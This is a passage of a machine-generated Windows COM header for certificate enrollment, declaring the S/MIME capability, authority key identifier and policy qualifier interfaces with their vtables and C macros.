    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionAuthorityKeyIdentifier_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionAuthorityKeyIdentifier_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionAuthorityKeyIdentifier_InitializeEncode(This,Encoding,strKeyIdentifier)	\
    ( (This)->lpVtbl -> InitializeEncode(This,Encoding,strKeyIdentifier) ) 

#define IX509ExtensionAuthorityKeyIdentifier_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionAuthorityKeyIdentifier_get_AuthorityKeyIdentifier(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AuthorityKeyIdentifier(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionAuthorityKeyIdentifier_INTERFACE_DEFINED__ */


#ifndef __ISmimeCapability_INTERFACE_DEFINED__
#define __ISmimeCapability_INTERFACE_DEFINED__

/* interface ISmimeCapability */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISmimeCapability;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab319-217d-11da-b2a4-000e7bbb2b09")
    ISmimeCapability : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ LONG BitCount) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BitCount( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ISmimeCapabilityVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISmimeCapability * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISmimeCapability * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISmimeCapability * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISmimeCapability * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ISmimeCapability * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ LONG BitCount);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ISmimeCapability * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BitCount )( 
            __RPC__in ISmimeCapability * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        END_INTERFACE
    } ISmimeCapabilityVtbl;

    interface ISmimeCapability
    {
        CONST_VTBL struct ISmimeCapabilityVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISmimeCapability_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISmimeCapability_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISmimeCapability_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISmimeCapability_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISmimeCapability_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISmimeCapability_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISmimeCapability_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISmimeCapability_Initialize(This,pObjectId,BitCount)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,BitCount) ) 

#define ISmimeCapability_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ISmimeCapability_get_BitCount(This,pValue)	\
    ( (This)->lpVtbl -> get_BitCount(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISmimeCapability_INTERFACE_DEFINED__ */


#ifndef __ISmimeCapabilities_INTERFACE_DEFINED__
#define __ISmimeCapabilities_INTERFACE_DEFINED__

/* interface ISmimeCapabilities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ISmimeCapabilities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31a-217d-11da-b2a4-000e7bbb2b09")
    ISmimeCapabilities : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapability **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ISmimeCapability *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddFromCsp( 
            /* [in] */ __RPC__in_opt ICspInformation *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddAvailableSmimeCapabilities( 
            /* [in] */ VARIANT_BOOL MachineContext) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ISmimeCapabilitiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ISmimeCapabilities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ISmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ISmimeCapabilities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ISmimeCapabilities * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapability **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ISmimeCapabilities * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ISmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ISmimeCapability *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ISmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *AddFromCsp )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ICspInformation *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *AddAvailableSmimeCapabilities )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ VARIANT_BOOL MachineContext);
        
        END_INTERFACE
    } ISmimeCapabilitiesVtbl;

    interface ISmimeCapabilities
    {
        CONST_VTBL struct ISmimeCapabilitiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISmimeCapabilities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISmimeCapabilities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISmimeCapabilities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISmimeCapabilities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISmimeCapabilities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISmimeCapabilities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISmimeCapabilities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISmimeCapabilities_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ISmimeCapabilities_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ISmimeCapabilities_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ISmimeCapabilities_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ISmimeCapabilities_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ISmimeCapabilities_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ISmimeCapabilities_AddFromCsp(This,pValue)	\
    ( (This)->lpVtbl -> AddFromCsp(This,pValue) ) 

#define ISmimeCapabilities_AddAvailableSmimeCapabilities(This,MachineContext)	\
    ( (This)->lpVtbl -> AddAvailableSmimeCapabilities(This,MachineContext) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISmimeCapabilities_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__
#define __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__

/* interface IX509ExtensionSmimeCapabilities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionSmimeCapabilities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31b-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionSmimeCapabilities : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ISmimeCapabilities *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SmimeCapabilities( 
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapabilities **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509ExtensionSmimeCapabilitiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionSmimeCapabilities * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ISmimeCapabilities *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapabilities **ppValue);
        
        END_INTERFACE
    } IX509ExtensionSmimeCapabilitiesVtbl;

    interface IX509ExtensionSmimeCapabilities
    {
        CONST_VTBL struct IX509ExtensionSmimeCapabilitiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionSmimeCapabilities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionSmimeCapabilities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionSmimeCapabilities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionSmimeCapabilities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionSmimeCapabilities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionSmimeCapabilities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionSmimeCapabilities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionSmimeCapabilities_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionSmimeCapabilities_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionSmimeCapabilities_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionSmimeCapabilities_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionSmimeCapabilities_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionSmimeCapabilities_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionSmimeCapabilities_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionSmimeCapabilities_get_SmimeCapabilities(This,ppValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0031 */
/* [local] */ 

typedef 
enum PolicyQualifierType
    {
        PolicyQualifierTypeUnknown	= 0,
        PolicyQualifierTypeUrl	= 1,
        PolicyQualifierTypeUserNotice	= 2,
        PolicyQualifierTypeFlags	= 3
    } 	PolicyQualifierType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0031_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0031_v0_0_s_ifspec;

#ifndef __IPolicyQualifier_INTERFACE_DEFINED__
#define __IPolicyQualifier_INTERFACE_DEFINED__

/* interface IPolicyQualifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IPolicyQualifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31c-217d-11da-b2a4-000e7bbb2b09")
    IPolicyQualifier : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strQualifier,
            /* [in] */ PolicyQualifierType Type) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Qualifier( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out PolicyQualifierType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IPolicyQualifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IPolicyQualifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IPolicyQualifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IPolicyQualifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IPolicyQualifier * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in BSTR strQualifier,
            /* [in] */ PolicyQualifierType Type);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Qualifier )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__out PolicyQualifierType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IPolicyQualifierVtbl;

    interface IPolicyQualifier
    {
        CONST_VTBL struct IPolicyQualifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IPolicyQualifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IPolicyQualifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IPolicyQualifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IPolicyQualifier_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IPolicyQualifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IPolicyQualifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IPolicyQualifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IPolicyQualifier_InitializeEncode(This,strQualifier,Type)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strQualifier,Type) ) 

#define IPolicyQualifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IPolicyQualifier_get_Qualifier(This,pValue)	\
    ( (This)->lpVtbl -> get_Qualifier(This,pValue) ) 

#define IPolicyQualifier_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IPolicyQualifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IPolicyQualifier_INTERFACE_DEFINED__ */


#ifndef __IPolicyQualifiers_INTERFACE_DEFINED__
#define __IPolicyQualifiers_INTERFACE_DEFINED__

/* interface IPolicyQualifiers */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IPolicyQualifiers;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31d-217d-11da-b2a4-000e7bbb2b09")
    IPolicyQualifiers : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifier **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
